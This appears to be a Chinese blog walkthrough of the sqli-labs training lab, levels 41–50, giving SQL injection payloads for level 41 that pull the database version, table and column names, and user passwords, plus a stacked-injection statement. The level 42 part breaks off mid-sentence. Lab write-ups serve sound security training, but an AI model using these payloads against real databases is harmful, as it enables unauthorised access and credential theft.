sql-lib闯关秘籍之41-50关

时间:2021-07-26 02:53:36

下面开始11-20关,之前不会的关卡可以参考我这几篇文章: sql-lib闯关秘籍之1-10关sql-lib闯关秘籍之11-20关sql-lib闯关秘籍之21-30关, sql-lib闯关秘籍之41-50关

不管是第几关,我们的最终目标是获得用户密码,从而获取最高权限!

以下的学习过程中如果遇到那里不会的或者不清楚的地方,欢迎大家留言,我将尽力帮助大家~

第四十一关

这关和第三十九关一样,只是错误没有回显

获得版本和数据库名   ?id=0 union select 1,version(),database() #

获得表名    ?id=0 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() #

获得列名     ?id=0 union select 1,2,group_concat(column_name) from information_schema.columns where table_name=0x7573657273 #

获取用户名密码  ?id=0 union select 1,group_concat(username),group_concat(password) from security.users where 1 #

sql-lib闯关秘籍之41-50关

 

 也是可以堆叠注入的,堆叠注入语句   ?id=1;create table test41 like users;#

 第四十二关

 熟悉的界面、

sql-lib闯关秘籍之41-50关

本来想注册,但是好像不能

sql-lib闯关秘籍之41-50关

 

 

 这一关因为user设置了过滤函数mysqli_real_escape_string()
所以我们在密码处构造

 

41-50关结束

该文章有参考了以下的网页:

 

SQL注入靶场sqli-labs 1-65关全部通关教程

SQLi_Labs通关文档【1-65关】

 sqli-labs 1-65教程